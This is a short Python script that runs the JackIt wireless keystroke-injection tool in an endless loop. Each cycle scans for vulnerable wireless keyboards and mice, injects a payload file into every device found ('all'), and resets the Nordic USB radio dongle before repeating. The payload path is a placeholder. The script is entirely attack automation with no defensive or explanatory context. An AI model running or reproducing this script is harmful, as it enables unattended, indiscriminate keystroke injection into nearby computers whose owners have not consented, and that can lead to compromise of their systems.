#!/usr/bin/python
#Insert your own payload path
import pexpect, time, sys, os, datetime
from subprocess import call


while True:
  time.sleep(10)
  print("Starting Jackit")
  print str(datetime.datetime.now())
  id = pexpect.spawn('jackit --script <path/to/payload>/payload.txt')
  print("Scanning")
  time.sleep(30)
  id.send(chr(3))
  id.sendline('all')
  print("Payloads Injected")
  usbpath=os.popen("lsusb | grep Nordic | sed -r 's/Bus ([0-9]+) Device ([0-9]+): .*$/\/dev\/bus\/usb\/\\1\/\\2/'").read()
  print "usb path =" + usbpath.strip()
  print "resetting usb"
  reset=os.popen('./usbreset '+ usbpath.strip()).read()
  print reset
